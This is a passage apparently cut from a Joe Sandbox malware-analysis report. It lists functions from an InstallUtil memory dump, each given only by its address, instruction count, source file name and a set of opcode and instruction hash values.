                                                                                          • Instruction ID: 3796d6ff05f1d2771d68bfa1d98f0bf40527360ab6be5e9aedd99b62e55d80da
                                                                                          • Opcode Fuzzy Hash: e67a4a64725526ff4ee00bad20ab52f7882f7c7e067ffba9fb2eae6bee8a240d
                                                                                          • Instruction Fuzzy Hash: 0CF0F637E04110CBD721CFAC98512AC7BB1FE563217198097D40DDB252D728D806E753
                                                                                          Function 00F78F00 Relevance: .0, Instructions: 36COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d0421f488855dd7a9792370355dc5877e44ca58b64afcb2f09447409563289
                                                                                          • Instruction ID: e930bf09702a73f57ee9d51c058c3973e3744c02028b6076ebf8f0556c2a6143
                                                                                          • Opcode Fuzzy Hash: 67d0421f488855dd7a9792370355dc5877e44ca58b64afcb2f09447409563289
                                                                                          • Instruction Fuzzy Hash: 47017C3491114AEFDB02FFB8F9516CC7BB1EF84300F2045A8C1059B254EF706A159751
                                                                                          Function 00F78F10 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 76437c3627f566dbfa87b2f6c2d70955d4b6a065a1d6a8283da17e0946b7ec87
                                                                                          • Instruction ID: 236853d0c1bbf863d4d33e98cd98ae3b2a4ad67fea6c4b6a5ed4bc8c81aa6f2f
                                                                                          • Opcode Fuzzy Hash: 76437c3627f566dbfa87b2f6c2d70955d4b6a065a1d6a8283da17e0946b7ec87
                                                                                          • Instruction Fuzzy Hash: 94F03C34A0024AEFDB42FBB8F8526DDBBB1EB84300F5085A8C5059B254EF702E55DB91
                                                                                          Function 00F77EE1 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000007.00000002.3529775885.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_7_2_f70000_InstallUtil.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 41e5741df3d4e74b4ef3adef73f4d30b686807fadeb28e0892d555800b150c81
                                                                                          • Instruction ID: cb946f3d824e49762b402ed9c37dc80c3dea1a11e8fd5b1dd945fc9462bf581b
                                                                                          • Opcode Fuzzy Hash: 41e5741df3d4e74b4ef3adef73f4d30b686807fadeb28e0892d555800b150c81
                                                                                          • Instruction Fuzzy Hash: FCC08C2A9183DAC9CB5062A8B8183D83B20CB80336F20089BD2098196087B009E8AA62